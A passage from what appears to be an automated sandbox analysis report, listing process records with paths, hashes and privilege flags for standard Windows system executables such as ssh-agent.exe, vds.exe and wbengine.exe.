Commandline:	C:\Windows\System32\OpenSSH\ssh-agent.exe
Imagebase:	0x140000000
File size:	1'617'920 bytes
MD5 hash:	33B97B079F45CE82E6F4A328EBAB3909
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	18
Start time:	08:10:30
Start date:	16/12/2024
Path:	C:\Windows\System32\TieringEngineService.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\TieringEngineService.exe
Imagebase:	0x140000000
File size:	1'562'112 bytes
MD5 hash:	0EFAE9B5227A7ADB6C73C07C5181848C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	19
Start time:	08:10:31
Start date:	16/12/2024
Path:	C:\Windows\System32\AgentService.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\AgentService.exe
Imagebase:	0x140000000
File size:	1'801'216 bytes
MD5 hash:	46464B0DFA3DB2510FE14D5EF738D11F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	20
Start time:	08:10:31
Start date:	16/12/2024
Path:	C:\Windows\System32\vds.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\vds.exe
Imagebase:	0x140000000
File size:	1'303'552 bytes
MD5 hash:	80D7884B22003F22FE0208D240E92F07
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	23
Start time:	08:10:33
Start date:	16/12/2024
Path:	C:\Windows\System32\wbengine.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\wbengine.exe"
Imagebase:	0x140000000
File size:	2'164'736 bytes
MD5 hash:	04B39AF4F8E72AEADC4486811B47C3B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false